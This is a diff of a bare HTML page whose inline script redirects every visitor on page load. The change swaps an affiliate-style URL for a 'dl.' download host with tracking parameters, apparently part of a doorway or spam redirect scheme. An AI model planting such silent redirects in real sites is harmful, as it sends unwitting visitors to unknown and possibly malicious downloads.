--- a/47.html
+++ b/47.html
@@ -1,4 +1,4 @@
     
 <script>
-  window.location.href="https://main.RY803.com/?AgentId=12087784"
+  window.location.href="https://dl.hawcyy.com/?parent=158113&t=1592627981"
 </script>
